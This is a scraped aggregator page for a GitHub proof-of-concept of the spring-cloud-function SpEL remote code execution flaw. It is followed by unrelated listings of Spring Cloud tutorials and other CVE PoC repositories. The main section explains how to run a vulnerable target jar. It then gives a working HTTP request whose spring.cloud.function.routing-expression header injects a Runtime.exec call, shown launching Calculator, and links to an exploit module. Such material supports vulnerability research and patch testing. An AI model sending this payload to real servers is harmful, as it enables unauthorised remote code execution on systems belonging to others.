spring-cloud-function SpEL RCE, Vultarget & Poc

Last update: Nov 30, 2022

Overview

spring-cloud-function SpEL RCE

Vultarget

You can build it for youself. here is the source of the Vuln App

Or you can use the release which built by cckuailong(Yh,it's me)

java -jar function-sample-pojo-3.2.1.RELEASE.jar

P.S. test with Java17

Poc

POST /xxx HTTP/1.1
Host: test.com:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3

xxx

Result

RCE！！

Enjoy it!

I put the poc code in the repo:

https://github.com/cckuailong/pocsploit

https://github.com/cckuailong/pocsploit/blob/master/modules/vulnerabilities/springcloud/springcloud-function-spel-rce.py

Article

PoC for CVE-2021-31805 (Apache Struts2)

CVE-2021-31805 PoC for CVE-2021-31805 (Apache Struts2) CVE-2021-31805の解説記事で使用したアプリケーションです。セットアップ $ docker-compose build $ docker-compose up -d 動作確認

May 21, 2022

Slueth(Zipkin) 를 통한 SQS Message Tracing POC(Proof of concept) 입니다.

Sleuth AWS SQS POC 해당 프로젝트는 Slueth(Zipkin) 를 통한 메시지 추적 POC(Proof of concept) 입니다. Rest API 를 통해 POST 요청을 받으면, 메시지를 발행/소비 합니다. 이 과정에서 유지되는 TraceId 를 확인

Nov 29, 2022

一套涵盖大部分核心组件使用的Spring Cloud教程，包括Spring Cloud Alibaba及分布式事务Seata，基于Spring Cloud Greenwich及SpringBoot 2.1.7。22篇文章，篇篇精华，32个Demo，涵盖大部分应用场景。

springcloud-learning 简介一套涵盖大部分核心组件使用的Spring Cloud教程，包括Spring Cloud Alibaba及分布式事务Seata，基于Spring Cloud Greenwich及SpringBoot 2.1.7。22篇文章，篇篇精华，32个Demo，涵盖

Dec 30, 2022

Z is a Java library providing accessible, consistent function combinators.

Fearless function combination in Java Techniques Unlock your functional programming potential with these combination techniques: Fusion Z.fuse(fn1, fn

Jun 13, 2022

🔥 强大的动态线程池，并附带监控报警功能（没有依赖中间件），完全遵循阿里巴巴编码规范。Powerful dynamic thread pool, does not rely on any middleware, with monitoring and alarm function.

🔥 动态线程池（DTP）系统，包含 Server 端及 SpringBoot Client 端需引入的 Starter. 这个项目做什么？动态线程池（Dynamic-ThreadPool），下面简称 DTP 系统美团线程池文章介绍中，因为业务对线程池参数没有合理配置，触发过几起生产事故，进而

Dec 30, 2022

Pulsar airquality function

pulsar-airquality-function Developer Workspace Using JDK 8. 1.8.0_292. OPEN JDK 64-bit Server Using IntelliJ IDEA CE 2021.2 Developer Deployment Serve

Jun 27, 2022

An example project showing how to enable tiered compilation on a Java AWS Lambda function.

AWS Lambda Tiered Compilation Sample Getting started Download or clone the repository. To install prerequisite software: Install AWS CDK Install Apach

Dec 13, 2022

mall-swarm是一套微服务商城系统，采用了 Spring Cloud Hoxton & Alibaba、Spring Boot 2.3、Oauth2、MyBatis、Docker、Elasticsearch、Kubernetes等核心技术，同时提供了基于Vue的管理后台方便快速搭建系统。mall-swarm在电商业务的基础集成了注册中心、配置中心、监控中心、网关等系统功能。文档齐全，附带全套Spring Cloud教程。

mall-swarm 友情提示快速体验项目：在线访问地址。全套学习教程：《mall学习教程》。 Spring Cloud全套教程：《SpringCloud学习教程》。专属学习路线：学习不走弯路，整理了套非常不错的《mall专属学习路线》。项目交流：想要加群交流项目的朋友，可以加入mall项目

Jan 3, 2023

芋道 mall 商城，基于微服务的思想，构建在 B2C 电商场景下的项目实战。核心技术栈，是 Spring Boot + Dubbo 。未来，会重构成 Spring Cloud Alibaba 。

[toc] 友情提示：近期在升级和优化该项目，建议先 Star 本项目。主要在做几个事情： 1、微服务技术选型以 Spring Cloud Alibaba 为中心。 2、修改项目分层，并合并部分服务，简化整体服务的复杂性。 3、将管理后台从 React 重构到 Vue 框架。交流群：传送门前言

Jan 6, 2023

Owner

cckuailong

勇气，友情，爱心，知识，诚实，纯真，希望，光明

GitHub

Apache/Alibaba Dubbo <= 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions <= 2.7.6 With Different Gadgets

The 0xDABB of Doom - CVE-2021-25641-Proof-of-Concept Apache/Alibaba Dubbo <= 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Da

51 Apr 24, 2022

log4j2 rce、poc

Apache Log4j 2 Apache log4j2 开源日志组件远程代码执行攻击者通过构造恶意请求，触发服务器log4j 2 日志组件的远程代码执行漏洞。漏洞无需特殊配置，经验证，最新版的补丁可以防护此问题官方最新补丁： log4j-2.15.0-rc2 紧急处置方案 2.10 or 以上

86 Dec 4, 2022

一个涵盖六个专栏：Spring Boot 2.X、Spring Cloud、Spring Cloud Alibaba、Dubbo、分布式消息队列、分布式事务的仓库。希望胖友小手一抖，右上角来个 Star，感恩 1024

友情提示：因为提供了 50000+ 行示例代码，所以艿艿默认注释了所有 Maven Module。胖友可以根据自己的需要，修改 pom.xml 即可。一个涵盖六个主流技术栈的正经仓库：《Spring Boot 专栏》《Spring Cloud Alibaba 专栏》《Spring Clou

15.7k Dec 31, 2022

Demo microservice architecture with Spring ,Spring Cloud Gateway , Spring Cloud config server , Eureuka , keycloak and Docker.

spring-microservice Demo microservice architecture with Spring ,Spring Cloud Gateway , Spring Cloud config server , Eureuka , keycloak and Docker. Arc

4 Sep 13, 2022

A high availability shopping(ecommerce) system using SpringBoot, Spring Cloud, Eureka Server, Spring Cloud Gateway, resillience4j, Kafka, Redis and MySQL.

High-availability-shopping-system A high availability shopping(ecommerce) system using SpringBoot, Spring Cloud, Eureka Server, Spring Cloud Gateway,

1 Oct 26, 2022

A spring cloud infrastructure provides various of commonly used cloud components and auto-configurations for high project consistency

A spring cloud infrastructure provides various of commonly used cloud components and auto-configurations for high project consistency.

2 Feb 8, 2022